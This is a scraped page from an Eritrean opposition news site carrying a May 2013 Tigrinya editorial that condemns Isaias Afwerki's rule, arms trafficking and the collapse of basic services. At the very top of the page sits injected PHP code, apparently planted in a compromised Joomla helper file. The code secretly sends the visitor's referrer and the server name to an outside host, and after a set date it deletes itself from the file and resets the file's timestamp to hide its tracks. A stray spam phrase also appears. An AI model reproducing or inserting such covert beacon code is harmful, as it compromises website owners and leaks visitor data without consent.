check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } መ ል እ ኽ ቲ ወ ጋ ሕ ታ
кремлевская диета

መ ል እ ኽ ቲ ወ ጋ ሕ ታ

User Rating: / 0
PoorBest 

 

 

 

 

 

11 ግንቦት 2013

   

ዝኸበርኹም ተኸታተልቲ መርበብ ሓበሬታ ሳሊና ዶት ኮም፡ ንምቑሉል ተበጻሕነትን ምዕቡልን ሰፊሕን ትሕዝቶ ዘለዎ ኣገልግሎት መርበብ ሓበሬታ ንምህናጽ ብምሕሳብ 80 ሚኢታዊት ዓቕሚ መርበብ ሓበሬታና ዘዕቢ ስራሕ ንምስራሕ ኣብ ዳግመ ምትዕርራይ ኣብ ንርከበሉ ዘለና ኣብዚ ሕጂ እዋን ዘይተደለየ ግዜ ደፊእና ብምህላውና ንኹሎም ብምድንጓይና ተሻቒሎም በብዕለቱ ዝሰዱልና ዘለዉ መልእኽትታት ደጊምና ይቕሬታ ናሓተትና ብሬድዮ ወጋሕታ ኣብ ሙሉእ ሃገርናን ጎረባብትናን ዝስማዕ ዘሎ መደባትና ናተመረጹ ኣብተን ቀንዲ ቀንዲ ሓላፍነታውያን መርበብ ሓበሬታታት ሃገርና ክቃላሕ ይግበር ከምዘሎ ናገለጽና ነቶም ብሓላፍነት መንፈስ ዕለታዊ ዜናታትናን ርእሲ ዓንቀጽ ኢዲቶሪያል ቦርድን ከይሰልከዩ ከመሓላልፉ ዝጸንሑን ዘለዉን ሓቀኛ መሓዙትና ዘለና ልባዊ ኣክብሮት ክንገልጽ ንፈቱ። ሕጂውን በቲ ዝተለምናዮ መሰረት ሬድዮና ብኩሉ ሸነኻት ናይ ሬድዮ ዓይነት ፈነወታት ንዝፍኖ መደባት ሬድዮ ወጋሕታ ብቀጥታ ብላይቭ ስትሪሚንግ ንምትሕልላፍ ዘኽእል ዓቕሚ ሒዙ ንክወጽእ ገለ ግዜ የድልየና ስለዘሎ ብትዕግስቲ ክትጽበዩና ናተላበና ናብ ናይ ሎሚ ርእሰ ዓንቀጽና ክንኣቱ።

ብረት ትርኣስ ነብሲ ወከፍ ዜጋ ኣብ ዝኾነሉ ሃገር ብሰንኪ እገዳ ሉኣላውነትና ተደፊሩ ምባልከ ዕብዳን ሽሕጣን

ኤርትራ ብበዝሒ ብረት ጥራሕ ዘይኮነስ ነፍሲ ወከፍ መንእሰይን ሽማግለን ዜጋ ብምዕጣቕ ኣብ ታሪክ ዓለምና ቀዳምነት ዝሓዘት ተተብሃለ ነቲ ውልቀ መላኺ ኢሳይያስ ጃህራ መሲልዎ ኣብ ሓደ እዋን ዝበሎ ምዝኽኻር እምበር ምግናን ኣይኮነን። ኢሳይያስ ብሓማሲ ተግባራቱ ብባይቶ ጸጥታ እገዳ ኣብ ዝተነበረሉ እዋን ጃህራ መሲልዎ ኤርትራ ንብዙሓት ሃገራት ዘዕጥቕ ብረት ዘለዋ ሃገር ስለዝኾነት እገዳ ላግጺ እዩ ኢሉ ምንባሩ ይዝከር ብተግባር’ውን ኣብ ሶማልያ ዝነበሩ ኣኽረርቲ ኣብ ሃገርና ዝርከቡ ናይ ኢትዮጵያ፡ጁቡቲ፡ ሱዳንን የመንን ጥሩፋት ጉጅለታትን ኣብ ርእሲ ምዕጣቑ ሕጂ ከኣ ናብ ማእኸላይ ኣፍሪቃ’ውን ተሰጋጊሩ ዕልዋ መንግስቲ ንዝገብሩ ዘለዉ ጉጅለታት ብረት ይሸይጥን የሰጋግርን ምህላዉ ብመርትዖ ተረጋጊጹ ኣሎ።

ኣብ ሃገርና ብረት ካብ ዕንጨይትን ፈሓምን ስለዝበዝሐ ኩሉ ህዝቢ ይዕጠቕ ኢሉ ካብቲ  ብጀነራል ወዲ ኤፍሬም ዝምራሕ ምዱብ ሰራዊት ዝበዝሐ ካሊእ ብብ/ጀ ተኽለ ማንጁስ ዝምራሕ ህዝባዊ ሰራዊት ዝተሰመየ ናይ ልዕሊ ዕድመ ወለዲ ሰራዊት ተመስሪቱ ኣሎ። በቲ ኩሉ ይዕጠቕ ዝብል እኩይ ውጡን ኢሳይያስ ብረት ተዓጢቖም ክሕክሙ ዝተገደዱ ሓኻይም ሃገርና ኣታ ብመርፍእ ዲና ብብረት ኢና ፈውሲ ክንወግእ” ብምባል ደረጃ ምረቶም ይገልጹዎ ኣለዉ። ሕጂ ኣብ ሃገርና ተገቲሩ ዘሎ ዓቢ ጸገም ናይ ማሕበረቁጠባን ጸጥታን ሽግር’ዩ። ሓይሊ ኤሌክትሪክ ብሪጋ ክኸውን ብስሩዕ ካብ ዝእውጅ ጀሚሩ ልቺ ብሪጋ ንሸሞንተ ሰዓታት ክትመጽእ እኳ ተተወሰነ ኣብቲ ዝርካቡ ዝተብሃሎ ግዜ’ውን ካብትመጾ ዘይትመጾ ይበዝሕ። ብጀነሬተር ክሰርሑ ዝኽእሉ ኣብያተ ጽሕፈታትን ገለ ናይ ንግዲ ትካላትን ዘን ከተማታትና ልቺ ብልጭ ዝብለለን ናይ ተስፋ ሃዋህው ክፈጥራን መግቢ ኣብሲለን ክሸጣን ፈቲነን ነይረን ። ህዝቢ ጸልማት ክኽደን ዝዕላምኡ ቀናእ ኢሳይያስ ግን ካብ ‘ዛ ደንደን ወጻእ መን ጀነሬተር ተጠቐሙ ኢልኩም ኢሉ ኣጊዱ ኣሎ። ዘርኢ ነዳዲ’ውን ዋላ ብኮንትሮባንድ ንምእታው ሸርፊ ወጻኢ ስለዝሓርበተ ደውታ ተፈጢሩ’ዩ።

-       ኣገልግሎት ሕክምና ዳርጋ የለን

ኣፋውስ ኣብ ርእሲ ዘይምህላዎም ኣለዉ ዝበሃሉ ሓካይም ካብ ሃገር ብስደት ስለዝወጹ ህዝቢ ናብ ባህላዊ ሕክምና ተመሊሱ ይርከብ። ኣገልግሎት ቴሌኮሚኒኬሽን ዳርጋ መሊኡ ጠጠው ኢሉ ተተብሃለ ይቐልል። ሞባይልን ኢንተርኔትን ጥራሕ ዘይኮነስ ኮላይ ‘ቲ ናይ መስመር ስልኪ’ውን ንልዕሊ ሳምንታት ጠጠው ኢሉ ሓንሳብ ምጽእ ኢሉ ህልም ዝብለሉ ግዜ ልሙድ ተርእዮ ኮይኑ ኣሎ።

ሃለኽቲ ሸቐጣት ኣብ ርእሲ ዋገኦም በብግዚኡ ሰማይ ምዕራጎም ኣቅርቦት’ውን የለን ጸጥታ ሃገር ካብ ዝናጋዕ ጸንሑ ኣሎ። ቀታሊኡ ዘይፍለጥ ሬሳ ኣብዝን ኣብትን ተደርብዩ ይርከብ ኣሎ።

ፖሊሲን ሃገራዊ ድሕነትን ጸጥታ ከረጋግእ ዘይኮነስ’ቲ ዝተደርበየ ሬሳ ሰብ ከይርአ ቅልጥፍ ኢሉ ኣብ ምቕባር ተጸሚዱ ይርከብ ኣሎ። ቆልዑት ጨዊኻ ጅሆ ብምሓዝ ምስወለዶም ብገንዘብ ምውዕዓል ኣብ ጫፍ ሱዳን ከኣ ሰባት ናጨወኻ ንበዳዊንን ራሻይዳን ምርካብ ቀንዲ ስራሕ ኢሳይያስን ተኽለማንጁስን ኮይኑ ይርከብ። ‘ዚኹሉ ዝኸ’ውን ዘሎ እገዳ ስለዝተነበረ ዘይኮነስ ዓቕሚ መንግስቲ ኢሳይያስ ማህሚኑ ካብ ህዝብን ሰራዊትን ተነጺሉ ኣብ ኣፍዕርበቱ ስለዝርከብ ዝተፈጠረ ጸገም’ዩ። እገዳ ካብቶም ዝተገለጹ ሸቐጣትን ኣፋውስን ከይኣቱ ዝኸልከሎ ነገር የለን። ፋሐምን ዕንጸይትን ከይተረፋ።

ካብ ሃገር ጠፊኡ ዘሎ እገዳ ስለዝተነበረሉ ኣይኮነን። እገዳ ዝተነበረ ኣብ ምንቅስቓስ እቶም ገበነኛታት፡ ኣብ ኣጽዋር ዝውውርን ዕድግን ኣብ ምድስካል ዝተሰረቐ ሃፍቲ ኢሳይያስን ቀንዲ ወይጦታቱን እዩ ነይሩ። ‘ዚ ንገዛእ ርእሱ ብኣግባቡ ተግባራዊ ስለዘይተገበረ ገበነኛ ኢሳይያስ ሓውሱ ወይጦታቱ ናብ ኣውሮጳ ቀጠርን ግብጽን ዞጋሕ ምባል ኣየቋረጹን። ብረት ንሶማልያን ጥሩፋት ጉጅለታት ምብራቕ ኣፍሪቃን ጥራሕ ዘይኮነ ኮላይ ንሃገራት ማእኸላይን ምዕራብን ኣፍሪቃ ይሸይጥን የዘዋወርን ኣሎ። ናብ ኤሽያ  ተሰጋጊሩ ንታይሚል ታይገርስ ከዕጥቅ ናብ ሓማስ ካብ ኢራን ብረት ከጎዓዕዝን ኣብ ሊብያ ዝተቖጸሩ ኮማንዶታቱ ልኢኹ ሸርፊ ወጻኢ ክምእርር ኣብ ሃገራት ዓበይቲ ቃላያት ኣልማዝ ብካሕሳ ዕልዋ መንግስቲ ክረክብ ኣይኣገዶን። ሕጂ ሓርቢትዎ ዘሎ ነገር ናይ ገዛእ ርእሱ ውሽጣዊ ዓቕሚ ሞሽሙሹ ሃደሽደሽ ስለዝበለ ኣብ ኩሉ ማሕበረሰብ ዓለም ተፈንፊኑ ተቐባልነት ስለዝሰኣን ኣብ ግዳም ካብዝርከቡ ዜጋታት ብግዲ ምውጻእ ክልተሚኢታዊት ገንዘብ ናተዳኸመ ስለዝኸዶ ጠጠው ኢሉ ንምኻድ ኣብራኹ ስለዝጠለምዎ’ዩ ኣብ ህዝብን ሰራዊትን እምነት ስለዘጉደለ ብኢሳይያስ ዝእወጅ ውግእ ኮነ ንኢሳይያስ ንምቕጻዕ ዝግበር ግብረመልሲ ሂወት ክኸፍል ድልው ኣይኮነን። ኢሳይያስን መሽረፈታቱን ዘይተበረሀሎም ነገር ተሎ ሰብ እምበር ብረት ተዋጊኡ ከምዘይስዕር’ዩ ብረት ይሃሉ ኣይሃሉ ሰብ ናይ ብሓቂ ተበዲለ እየ ተወሪረ እየ ኢሉ ተሓሲቡ ህዝቢ ብረት ካብ ጸላእቱ ናመንዘዐ’ውን ገጢሙ ከምዝስዕር ‘ቶም ተሸጊጦም ኣብ ቀበሌታት ዝነበሩ ናይ ደርጊ ተረፍ መረፍ ኣየፈልጥወን ይኾኑ እምበር ህዝቢ ኤርትራስ ብተግባር ኣብ ብረታዊ ተጋድሎ ንናጽነት ሃገር ሰሪሑ ርኢዎ እዩ። ሕጂ ኢሳይያስ ሃሊሉ ንኹለን ጎረባብትና ወሪሩ።ኣብ ኩለን ብዘሕፍር ስዕረት ዝተጎልበበሉ ምክንያት ህዝብን ሰራዊትን ኣብ ዘይናቶም ኩናት ኣትዮም ክምቱ ድልዋት ስለዘይኮኑ’ዩ። ንሉኣላውነቱ ኣብ ሓደጋ ዘውደቕ ሃገር ፈጺሙ ከምዘየለ ብብስለት ገምጊሙ ስለዝበጽሖ’ዩ። እኳድኣስ ድሕሪ ስርሒት ፎርቶ ኢሳይያስ ነቲ ምዱብ ሰራዊት ስለዘይኣምኖ ዕጥቁ ከላሕልሕ ብምሕሳብ ነቶም ሙኩራት ተዋጋእትን ኣዋጋእትን ይኣስር ነተን ሓያላት ዝበለን ኣሃዱታት ብተኽሊጥ ናወዘዐን ካብ ከተማ ናብ ሃሮሮማ ከባብታት ናበተነን ክዳኸማ ብምግባር ብናይ ተኽለማንጁስ ሰራዊት ክትከኣ ይገብር ኣሎ።

ታይዳኣሎም ወይጦታት ኢሳይያስ ምስቲ ናይ ኣይኦም ተግባርን ዘረባን ብስንጥቅ ዝተሃራረም ህወተታ ዝህውትቱ ዘለዉ እንቴልና ውጽኢት ምጥፋእ ምእኩል ናይ ፕሮፖጋንዳዊ ሃልኪ ጉጅለ ኢሳይያስ እዩ። ጉጅለ  ማፍያ ኢሳይየስ ሓሶትን ምትላልን ዝኣረገሉ ተግባር እኳ ተኾነ ሕጂግን

ዘይከም ቀደም ዝተወሃሃደን ተዓጻጻፍን ሓሶታት ንምስናዕ ኮነ ተግባራዊ ንምግባር ኣይከኣለን ዘሎ። ብሓሶታት መሃዝነት መሃንዲሳት ተባሂሎም ዝሕሰቡ በዓል ዓሊ ዓብዱ ሕጂ የለውን። ኢሳይያስ ኣሸንኳይ ፈጠራ ክፈጥር ዝተመስሖ ዝተደረሮ ምዝካር ኣብይዎ ዓጂሱ ብመስተ ተኸዊሉ’ዩ ዝነብር ዘሎ። በዓል ማንክን ዘምህረትን ድልየታት ኢሳይያስ ክፈልጡ ስለዘይከኣሉን ቀሪቦም ስለዘየዘራርበዎን ሓደሽቲ ሓሰታት ምምሃዝን ሰብ ምትላልን ኣይከኣሉን። ኩሎም ኣመራርሓ ጸጥታን ምክልኻልን ሃገር ምስ ኢሳይያስ ከብድን ሕቆን ስለዝኾኑ ኣብቲ ናይ ባዶ ሰለስተ ህውተታ ኣስተዋጽኦ ካብ ምግባር ተኣርኒቦም እዮም። ስለዚ እቶም ብገለ ኤምባሲታት ኢሳይያስ ዝምርሑ ዘለዉ ተረፍ መረፍ ናይ ደርጊ ቀበሌ ዝነበሩ ባንዳታት ዝመርሕወን መሽረፈታት ኮንዶኾን በዝሒ ህውተታ ብምህውታት ንኢሳይያስ ተሓጉስ ሓንቲ ነጥቢ ኣብ ቦታኣ ትዓርፈልና ትኸውን ብምባል ሓደ ሓሶት ጀሚሮም ከይወድኡ ናብ ካሊእ ዓበርብርን ደንበርበርን ናተሳገሩ መስሓቂ ሸራፋት  ኮይኖም ኣለዉ።

ኣብ ቅነ ሪፖርታዥ ኣፈጻጽማ እገዳታት ዝረኣይሉ ኣኼባታት ስለንርከብ እስከ “ሰኣን ብረት ሰራዊትና ዕጥቁ ፈቲሑ ሉኣላዊትና ክድፈር’ዩ” ኢልና ንብከሞ ምናልባት ኢሳይያስ ተታሓጕስላ ንፈትን ኢሎም ብዕውርድንብር ሳምንታዊ ናይ ህወታት ቅነ ጌሮም ቀንዮም ነይሮም። ይኹን እምበር ኢሳይያስ ምስ ዝበሎ ቀጥታ ዘይሳነ ስለዝኾነ ኣብ  ውሽጢ ሃገር ዝርከባ ሚዲያታት ኢሳይያስ ሓንቲ ቃል’ውን ክካፈለኣን ኣይከኣላን። እዚ ኣብ ግዳም ኢሳይያስ ዝውደቦም ንባዕሎም ካሊእ መንግስቲ ጌሮም ዝወስዱ ወይጦታት ምስ ኣብ ደንደን ዝርከብ ጉጅለ ኢሳይያስ ክናበቡ ከምዘይከኣሉን  ጉጅለ ኢሳይያስ እታ ዘዕበየቶን ዝምከሓላን ሓሶት ምስናዕን ዕለታዊ ናይ መታለሊ ህውተታን’ውን መሊኣ ትጥፍሽ ከምዘላን ስለዚከኣ ኢሳይያስ ዕምሪ ስልጣኑ ከጻንሐለን ዝኽእል ታኼላታት ኩለን ካብ ሱረን ተማሕየን ይድርብያ ምህላወን ዘበስር’ዩ። ’ዚ ከምኡ ናሃለወ ግን’ቲ ቀንዲ ቁምነገር ድሕሪ ኢሳይያስ ኣተሃላልዋ ሃገርና ምዕሩይን ዘኹርዕን ምእንታን ክኸውን ከሎ ገና ኢሳይያስ ሒዝዋ ከይጠፍአ ንምድሓን  ክከኣል ምእንቲ መንግስቲ ኣልቦ ኮይና ዘላ ሃገርና ኣብ ሞት ኢሳይያስ ብህዝባዊ መንግስትን ቅዋማውን ትካላውን ኣሰራርሓ ንምህናጽ ሕጂ ብሕብረት ንለዓል ናይ ሎሚ መልእክትና’ዩ።

-       ኩሉ ቀልብናን ሃምናን ንድሕነት ሃገር

-       ሉኡላውነት ሃገርና ኣብ መቃብር ኢሳይያስ’ዩ ዝውሕስ

ወጊድ ንፍርሒ ሓጀትና ንፍትሒ

ኢዲቶሪያል ቦርድ ወጋሕታ ሳሊና

11 ግንቦት 2013

 Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشرSecurity code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player